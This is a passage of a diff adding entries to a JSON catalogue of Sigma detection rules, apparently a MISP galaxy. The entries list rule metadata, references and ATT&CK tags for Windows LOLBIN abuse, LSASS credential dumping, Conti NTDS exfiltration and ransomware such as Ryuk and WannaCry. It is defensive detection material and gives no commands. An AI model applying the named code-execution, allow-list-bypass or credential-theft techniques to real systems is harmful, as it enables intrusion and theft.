Execution" + }, + { + "description": "Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe.", + "meta": { + "author": "frack113", + "creation_date": "2021/07/12", + "falsepositive": 
[ + "App-V clients" + ], + "filename": "proc_creation_win_lolbin_syncappvpublishingserver_execute_psh.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", + "https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_execute_psh.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "fbd7c32d-db2a-4418-b92c-566eb8911133", + "value": "SyncAppvPublishingServer Execute Arbitrary PowerShell Code" + }, + { + "description": "Executes arbitrary PowerShell code using SyncAppvPublishingServer.vbs", + "meta": { + "author": "frack113", + "creation_date": "2021/07/16", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1216/T1216.md", + "https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218", + "attack.t1216" + ] + }, + "uuid": "36475a7d-0f6d-4dce-9b01-6aeb473bbaf1", + "value": "SyncAppvPublishingServer VBS Execute Arbitrary PowerShell Code" + }, + { + "description": "Detects the executiob of TTDInject.exe, which is used by Windows 10 v1809 and newer to debug time travel (underlying call of tttracer.exe)", + "meta": { + "author": "frack113", + "creation_date": "2022/05/16", + "falsepositive": [ + 
"Legitimate use" + ], + "filename": "proc_creation_win_lolbin_ttdinject.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Ttdinject/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_ttdinject.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1127" + ] + }, + "uuid": "b27077d6-23e6-45d2-81a0-e2b356eea5fd", + "value": "Use of TTDInject.exe" + }, + { + "description": "Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.", + "meta": { + "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", + "creation_date": "2020/10/06", + "falsepositive": [ + "Legitimate usage by software developers/testers" + ], + "filename": "proc_creation_win_lolbin_tttracer_mod_load.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Tttracer/", + "https://twitter.com/mattifestation/status/1196390321783025666", + "https://twitter.com/oulusoyum/status/1191329746069655553", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_tttracer_mod_load.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.credential_access", + "attack.t1218", + "attack.t1003.001" + ] + }, + "uuid": "0b4ae027-2a2d-4b93-8c7e-962caaba5b2a", + "value": "Time Travel Debugging Utility Usage" + }, + { + "description": "Detects the use of a Microsoft signed script executing a managed DLL with PowerShell.", + "meta": { + "author": "frack113", + "creation_date": "2022/05/28", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_utilityfunctions.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + 
"https://lolbas-project.github.io/lolbas/Scripts/UtilityFunctions/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_utilityfunctions.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1216" + ] + }, + "uuid": "0403d67d-6227-4ea8-8145-4e72db7da120", + "value": "UtilityFunctions.ps1 Proxy Dll" + }, + { + "description": "VisualUiaVerifyNative.exe is a Windows SDK that can be used for AWL bypass and is listed in Microsoft's recommended block rules.", + "meta": { + "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", + "creation_date": "2022/06/01", + "falsepositive": [ + "Legitimate testing of Microsoft UI parts." + ], + "filename": "proc_creation_win_lolbin_visualuiaverifynative.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/VisualUiaVerifyNative/", + "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules", + "https://bohops.com/2020/10/15/exploring-the-wdac-microsoft-recommended-block-rules-visualuiaverifynative/", + "https://github.com/MicrosoftDocs/windows-itpro-docs/commit/937db704b9148e9cee7c7010cad4d00ce9c4fdad", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_visualuiaverifynative.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "b30a8bc5-e21b-4ca2-9420-0a94019ac56a", + "value": "Use of VisualUiaVerifyNative.exe" + }, + { + "description": "Detects successful code compilation via Visual Basic Command Line Compiler that utilizes Windows Resource to Object Converter.", + "meta": { + "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", + "creation_date": "2020/10/07", + "falsepositive": [ + "Utilization of this tool should not be seen in enterprise environment" + ], + "filename": 
"proc_creation_win_lolbin_visual_basic_compiler.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Vbc/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_visual_basic_compiler.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027.004" + ] + }, + "uuid": "7b10f171-7f04-47c7-9fa2-5be43c76e535", + "value": "Visual Basic Command Line Compiler Usage" + }, + { + "description": "The \"VSIISExeLauncher.exe\" binary part of the Visual Studio/VS Code can be used to execute arbitrary binaries", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/09", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_vsiisexelauncher.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/VSIISExeLauncher/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_vsiisexelauncher.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1127" + ] + }, + "uuid": "18749301-f1c5-4efc-a4c3-276ff1f5b6f8", + "value": "Use of VSIISExeLauncher.exe" + }, + { + "description": "The Workflow Command-line Compiler can be used for AWL bypass and is listed in Microsoft's recommended block rules.", + "meta": { + "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", + "creation_date": "2022/06/01", + "falsepositive": [ + "Legitimate use by a software developer" + ], + "filename": "proc_creation_win_lolbin_wfc.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wfc/", + 
"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_wfc.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1127" + ] + }, + "uuid": "49be8799-7b4d-4fda-ad23-cafbefdebbc5", + "value": "Use of Wfc.exe" + }, + { + "description": "Detects Winword process loading custmom dlls via the '/l' switch.\nWinword can be abused as a LOLBIN to download arbitrary file or load arbitrary DLLs.\n", + "meta": { + "author": "Nasreddine Bencherchali, Victor Sergeev, oscd.community", + "creation_date": "2022/05/17", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_winword.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Winword/", + "https://github.com/D4Vinci/One-Lin3r/blob/9fdfa5f0b9c698dfbd4cdfe7d2473192777ae1c6/one_lin3r/core/liners/windows/cmd/dll_loader_word.py", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_winword.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1202" + ] + }, + "uuid": "4ae3e30b-b03f-43aa-87e3-b622f4048eed", + "value": "Winword LOLBIN Usage" + }, + { + "description": "Detects use of Wlrmdr.exe in which the -u parameter is passed to ShellExecute", + "meta": { + "author": "frack113, manasmbellani", + "creation_date": "2022/02/16", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_wlrmdr.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/0gtweet/status/1493963591745220608?s=20&t=xUg9DsZhJy1q9bPTUWgeIQ", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_wlrmdr.yml" + ], + 
"tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "9cfc00b6-bfb7-49ce-9781-ef78503154bb", + "value": "Wlrmdr Lolbin Use as Launcher" + }, + { + "description": "Detects Too long PowerShell command lines", + "meta": { + "author": "oscd.community, Natalia Shornikova", + "creation_date": "2020/10/06", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_long_powershell_commandline.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_long_powershell_commandline.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "d0d28567-4b9a-45e2-8bbc-fb1b66a1f7f6", + "value": "Too Long PowerShell Commandlines" + }, + { + "description": "Detect creation of dump files containing the memory space of lsass.exe, which contains sensitive credentials.\nIdentifies usage of Sysinternals procdump.exe to export the memory space of lsass.exe which contains sensitive credentials.\n", + "meta": { + "author": "E.M. 
Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_lsass_dump.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://eqllib.readthedocs.io/en/latest/analytics/1e1ef6be-12fc-11e9-8d76-4d6bb837cda4.html", + "https://eqllib.readthedocs.io/en/latest/analytics/210b4ea4-12fc-11e9-8d76-4d6bb837cda4.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lsass_dump.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "ffa6861c-4461-4f59-8a41-578c39f3f23e", + "value": "LSASS Memory Dumping" + }, + { + "description": "Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/08/07", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_mailboxexport_share.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://youtu.be/5mqid-7zp8k?t=2481", + "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html", + "https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1", + "https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mailboxexport_share.yml" + ], + "tags": [ + "attack.exfiltration" + ] + }, + "uuid": "889719ef-dd62-43df-86c3-768fb08dc7c0", + "value": "Suspicious PowerShell Mailbox Export to Share" + }, + { + "description": "Detects a command 
used by conti to find volume shadow backups", + "meta": { + "author": "Max Altgelt, Tobias Michalski", + "creation_date": "2021/08/09", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_malware_conti.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/vxunderground/status/1423336151860002816?s=20", + "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_conti.yml" + ], + "tags": [ + "attack.t1587.001", + "attack.resource_development" + ] + }, + "uuid": "7b30e0a7-c675-4b24-8a46-82fa67e2433d", + "value": "Conti Volume Shadow Listing" + }, + { + "description": "Detects a command used by conti to exfiltrate NTDS", + "meta": { + "author": "Max Altgelt, Tobias Michalski", + "creation_date": "2021/08/09", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_malware_conti_7zip.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/vxunderground/status/1423336151860002816?s=20", + "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_conti_7zip.yml" + ], + "tags": [ + "attack.collection", + "attack.t1560" + ] + }, + "uuid": "aa92fd02-09f2-48b0-8a93-864813fb8f41", + "value": "Conti NTDS Exfiltration Command" + }, + { + "description": "Detects a command that accesses password storing registry hives via volume shadow backups", + "meta": { + "author": "Max Altgelt, Tobias Michalski", + "creation_date": "2021/08/09", + "falsepositive": [ + "Some rare backup scenarios" + ], + "filename": "proc_creation_win_malware_conti_shadowcopy.yml", + "level": 
"high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/vxunderground/status/1423336151860002816?s=20", + "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection", + "https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_conti_shadowcopy.yml" + ], + "tags": [ + "attack.impact", + "attack.t1490" + ] + }, + "uuid": "f57f8d16-1f39-4dcb-a604-6c73d9b54b3d", + "value": "Sensitive Registry Access via Volume Shadow Copy" + }, + { + "description": "Detects typical Dridex process patterns", + "meta": { + "author": "Florian Roth, oscd.community", + "creation_date": "2019/01/10", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_malware_dridex.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://app.any.run/tasks/993daa5e-112a-4ff6-8b5a-edbcec7c7ba3", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_dridex.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055", + "attack.discovery", + "attack.t1135", + "attack.t1033" + ] + }, + "uuid": "e6eb5a96-9e6f-4a18-9cdd-642cfda21c8e", + "value": "Dridex Process Pattern" + }, + { + "description": "Detects specific process parameters as seen in DTRACK infections", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/10/30", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_malware_dtrack.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://securelist.com/my-name-is-dtrack/93338/", + "https://app.any.run/tasks/4bc9860d-ab51-4077-9e09-59ad346b92fd/", + 
"https://app.any.run/tasks/ce4deab5-3263-494f-93e3-afb2b9d79f14/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_dtrack.yml" + ], + "tags": [ + "attack.impact", + "attack.t1490" + ] + }, + "uuid": "f1531fa4-5b84-4342-8f68-9cf3fdbd83d4", + "value": "DTRACK Process Creation" + }, + { + "description": "Detects all Emotet like process executions that are not covered by the more generic rules", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/09/30", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_malware_emotet.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://app.any.run/tasks/e13ab713-64cf-4b23-ad93-6dceaa5429ac/", + "https://app.any.run/tasks/81f3c28c-c686-425d-8a2b-a98198d244e1/", + "https://app.any.run/tasks/97f875e8-0e08-4328-815f-055e971ba754/", + "https://app.any.run/tasks/84fc9b4a-ea2b-47b1-8aa6-9014402dfb56/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_emotet.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027" + ] + }, + "uuid": "d02e8cf5-6099-48cf-9bfc-1eec2d0c7b18", + "value": "Emotet Process Creation" + }, + { + "description": "Detects Formbook like process executions that inject code into a set of files in the System32 folder, which executes a special command command line to delete the dropper from the AppData Temp folder. 
We avoid false positives by excluding all parent process with command line parameters.", + "meta": { + "author": "Florian Roth, oscd.community, Jonhnathan Ribeiro", + "creation_date": "2019/09/30", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_malware_formbook.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://inquest.net/blog/2018/06/22/a-look-at-formbook-stealer", + "https://app.any.run/tasks/388d5802-aa48-4826-b069-250420504758/", + "https://app.any.run/tasks/8e22486b-5edc-4cef-821c-373e945f296c/", + "https://app.any.run/tasks/62bb01ae-25a4-4180-b278-8e464a90b8d7/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_formbook.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1587.001" + ] + }, + "uuid": "032f5fb3-d959-41a5-9263-4173c802dc2b", + "value": "Formbook Process Creation" + }, + { + "description": "Detects NotPetya ransomware activity in which the extracted passwords are passed back to the main module via named pipe, the file system journal of drive C is deleted and windows eventlogs are cleared using wevtutil", + "meta": { + "author": "Florian Roth, Tom Ueltschi", + "creation_date": "2019/01/16", + "falsepositive": [ + "Admin activity" + ], + "filename": "proc_creation_win_malware_notpetya.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://securelist.com/schroedingers-petya/78870/", + "https://www.hybrid-analysis.com/sample/64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1?environmentId=100", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_notpetya.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.011", + "attack.t1070.001", + "attack.credential_access", + "attack.t1003.001", + "car.2016-04-002" + ] + }, + "uuid": 
"79aeeb41-8156-4fac-a0cd-076495ab82a1", + "value": "NotPetya Ransomware Activity" + }, + { + "description": "Detects QBot like process executions", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/10/01", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_malware_qbot.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/killamjr/status/1179034907932315648", + "https://app.any.run/tasks/2e0647b7-eb86-4f72-904b-d2d0ecac07d1/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_qbot.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.005" + ] + }, + "uuid": "4fcac6eb-0287-4090-8eea-2602e4c20040", + "value": "QBot Process Creation" + }, + { + "description": "Detects Ryuk ransomware activity", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/12/16", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_malware_ryuk.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://app.any.run/tasks/d860402c-3ff4-4c1f-b367-0237da714ed1/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_ryuk.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ] + }, + "uuid": "c37510b8-2107-4b78-aa32-72f251e7a844", + "value": "Ryuk Ransomware" + }, + { + "description": "Detects wscript/cscript executions of scripts located in user directories", + "meta": { + "author": "Margaritis Dimitrios (idea), Florian Roth (rule), oscd.community", + "creation_date": "2019/01/16", + "falsepositive": [ + "Winzip", + "Other self-extractors" + ], + "filename": "proc_creation_win_malware_script_dropper.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_script_dropper.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.t1059.005",
+ "attack.t1059.007"
+ ]
+ },
+ "uuid": "cea72823-df4d-4567-950c-0b579eaf0846",
+ "value": "WScript or CScript Dropper"
+ },
+ {
+ "description": "Trickbot enumerates domain/network topology and executes certain commands automatically every few minutes. This detectors attempts to identify that activity based off a command rarely observed in an enterprise network.",
+ "meta": {
+ "author": "David Burkett, Florian Roth",
+ "creation_date": "2019/12/28",
+ "falsepositive": [
+ "Rare System Admin Activity"
+ ],
+ "filename": "proc_creation_win_malware_trickbot_recon_activity.yml",
+ "level": "critical",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://www.sneakymonkey.net/2019/05/22/trickbot-analysis/",
+ "https://app.any.run/tasks/f74c5157-8508-4ac6-9805-d63fe7b0d399/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_trickbot_recon_activity.yml"
+ ],
+ "tags": [
+ "attack.discovery",
+ "attack.t1482"
+ ]
+ },
+ "uuid": "410ad193-a728-4107-bc79-4419789fcbf8",
+ "value": "Trickbot Malware Recon Activity"
+ },
+ {
+ "description": "Detects Trickbot malware process tree pattern in which rundll32.exe is parent of wermgr.exe",
+ "meta": {
+ "author": "Florian Roth",
+ "creation_date": "2020/11/26",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_malware_trickbot_wermgr.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://twitter.com/swisscom_csirt/status/1331634525722521602?s=20",
+ "https://app.any.run/tasks/f74c5157-8508-4ac6-9805-d63fe7b0d399/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_trickbot_wermgr.yml"
+ ],
+ "tags": [
+ 
"attack.execution",
+ "attack.t1559"
+ ]
+ },
+ "uuid": "58bf96d9-ff5f-44bd-8dcc-1c4f79bf3a27",
+ "value": "Trickbot Malware Activity"
+ },
+ {
+ "description": "Detects WannaCry ransomware activity",
+ "meta": {
+ "author": "Florian Roth (rule), Tom U. @c_APT_ure (collection), oscd.community, Jonhnathan Ribeiro",
+ "creation_date": "2019/01/16",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_malware_wannacry.yml",
+ "level": "critical",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_wannacry.yml"
+ ],
+ "tags": [
+ "attack.lateral_movement",
+ "attack.t1210",
+ "attack.discovery",
+ "attack.t1083",
+ "attack.defense_evasion",
+ "attack.t1222.001",
+ "attack.impact",
+ "attack.t1486",
+ "attack.t1490"
+ ]
+ },
+ "uuid": "41d40bff-377a-43e2-8e1b-2e543069e079",
+ "value": "WannaCry Ransomware"
+ },
+ {
+ "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT",
+ "meta": {
+ "author": "Florian Roth, Tom Ueltschi, Jonhnathan Ribeiro, oscd.community",
+ "creation_date": "2017/11/10",
+ "falsepositive": "No established falsepositives",
+ "filename": "proc_creation_win_mal_adwind.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100",
+ "https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mal_adwind.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.t1059.005",
+ "attack.t1059.007"
+ ]
+ },
+ "uuid": 
"1fac1481-2dbc-48b2-9096-753c49b4ec71",
+ "value": "Adwind RAT / JRAT"
+ },
+ {
+ "description": "Attempts to detect system changes made by Blue Mockingbird",
+ "meta": {
+ "author": "Trent Liffick (@tliffick)",
+ "creation_date": "2020/05/14",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_mal_blue_mockingbird.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://redcanary.com/blog/blue-mockingbird-cryptominer/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mal_blue_mockingbird.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.t1112",
+ "attack.t1047"
+ ]
+ },
+ "uuid": "c3198a27-23a0-4c2c-af19-e5328d49680e",
+ "value": "Blue Mockingbird"
+ },
+ {
+ "description": "Detects DarkSide Ransomware and helpers",
+ "meta": {
+ "author": "Florian Roth",
+ "creation_date": "2021/05/14",
+ "falsepositive": [
+ "Unknown",
+ "UAC bypass method used by other malware"
+ ],
+ "filename": "proc_creation_win_mal_darkside_ransomware.yml",
+ "level": "critical",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html",
+ "https://app.any.run/tasks/8b9a571b-bcc1-4783-ba32-df4ba623b9c0/",
+ "https://www.joesandbox.com/analysis/411752/0/html#7048BB9A06B8F2DD9D24C77F389D7B2B58D2",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mal_darkside_ransomware.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.t1204"
+ ]
+ },
+ "uuid": "965fff6c-1d7e-4e25-91fd-cdccd75f7d2c",
+ "value": "DarkSide Ransomware Pattern"
+ },
+ {
+ "description": "Detects process execution patterns found in intrusions related to the Hermetic Wiper malware attacks against Ukraine in February 2022",
+ "meta": {
+ "author": "Florian Roth",
+ "creation_date": "2022/02/25",
+ 
"falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_mal_hermetic_wiper_activity.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ukraine-wiper-malware-russia",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mal_hermetic_wiper_activity.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.lateral_movement",
+ "attack.t1021.001"
+ ]
+ },
+ "uuid": "2f974656-6d83-4059-bbdf-68ac5403422f",
+ "value": "Hermetic Wiper TG Process Patterns"
+ },
+ {
+ "description": "Detects LockerGoga Ransomware command line.",
+ "meta": {
+ "author": "Vasiliy Burov, oscd.community",
+ "creation_date": "2020/10/18",
+ "falsepositive": [
+ "Unlikely"
+ ],
+ "filename": "proc_creation_win_mal_lockergoga_ransomware.yml",
+ "level": "critical",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://medium.com/@malwaredancer/lockergoga-input-arguments-ipc-communication-and-others-bd4e5a7ba80a",
+ "https://blog.f-secure.com/analysis-of-lockergoga-ransomware/",
+ "https://www.carbonblack.com/blog/tau-threat-intelligence-notification-lockergoga-ransomware/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mal_lockergoga_ransomware.yml"
+ ],
+ "tags": [
+ "attack.impact",
+ "attack.t1486"
+ ]
+ },
+ "uuid": "74db3488-fd28-480a-95aa-b7af626de068",
+ "value": "LockerGoga Ransomware"
+ },
+ {
+ "description": "Detects Ryuk Ransomware command lines",
+ "meta": {
+ "author": "Vasiliy Burov",
+ "creation_date": "2019/08/06",
+ "falsepositive": [
+ "Unlikely"
+ ],
+ "filename": "proc_creation_win_mal_ryuk.yml",
+ "level": "critical",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://research.checkpoint.com/ryuk-ransomware-targeted-campaign-break/",
+ 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mal_ryuk.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.t1204"
+ ]
+ },
+ "uuid": "0acaad27-9f02-4136-a243-c357202edd74",
+ "value": "Ryuk Ransomware Command Line Activity"
+ },
+ {
+ "description": "Detects a usage of the manage-bde.wsf script that may indicate an attempt of proxy execution from script",
+ "meta": {
